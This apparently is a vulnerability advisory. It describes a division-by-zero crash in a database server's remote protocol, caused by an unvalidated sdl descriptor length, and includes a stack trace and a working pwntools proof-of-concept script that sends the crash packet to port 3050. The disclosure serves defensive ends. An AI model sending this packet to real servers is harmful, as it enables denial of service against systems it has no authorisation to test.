Summary

A malicious slice packet can lead to division by zero due to lack of the decoded sdl descriptor validation.

Details

The sdl_desc() function does not validate the length of the resulting descriptor and simply returns it. Later, the dsc_length will be used to calculate the number of items in the slice, which will result in a division by zero error.

But this vulnerability in not very stable, on Release build I was able to reproduce it on v3 only, and with Debug I was able to reproduce it on all actual version (>=v3). My guessing is that division by zero is UB, and compiler feel free to do anything it wants when this error occurs.

#0  xdr_slice (xdrs=0x7ffff7ec6ec0, slice=0x7ffff29f7908, sdl=0x7ffff7ec7010 "\001\006\001(") at src/remote/protocol.cpp:1881
#1  xdr_protocol (xdrs=0x7ffff7ec6ec0, p=0x7ffff29f7640) at src/remote/protocol.cpp:620
#2  receive (main_port=0x7ffff7ebde50, packet=0x7ffff29f7640) at src/remote/inet.cpp:2041
#3  rem_port::receive (this=0x7ffff7ebde50, pckt=0x7ffff29f7640) at src/remote/remote.cpp:664
#4  SRVR_multi_thread (main_port=0x7ffff7eb76d0, flags=2) at src/remote/server/server.cpp:1787
#5  main (argc=1, argv=0x7fffffffd460) at src/remote/server/os/posix/inet_server.cpp:582

PoC

To reproduce the vulnerability, simply run the server and the Python script to emulate the malicious packet.

from pwn import *

def build_crash_packet():
    pkt = struct.pack(">I", 0x3a)
    pkt += struct.pack(">I", 1) * 4
    pkt += struct.pack(">I", 8)
    pkt += b'\x01\x06\x01\x28'
    pkt += b'\x00\x00\x10\xff'
    pkt += struct.pack(">I", 3)
    pkt += b'\x00SYSDB\x00\x00'
    return pkt

p = remote('localhost', 3050)
p.send(build_crash_packet())
p.close()

Impact

Essentially, every server is affected.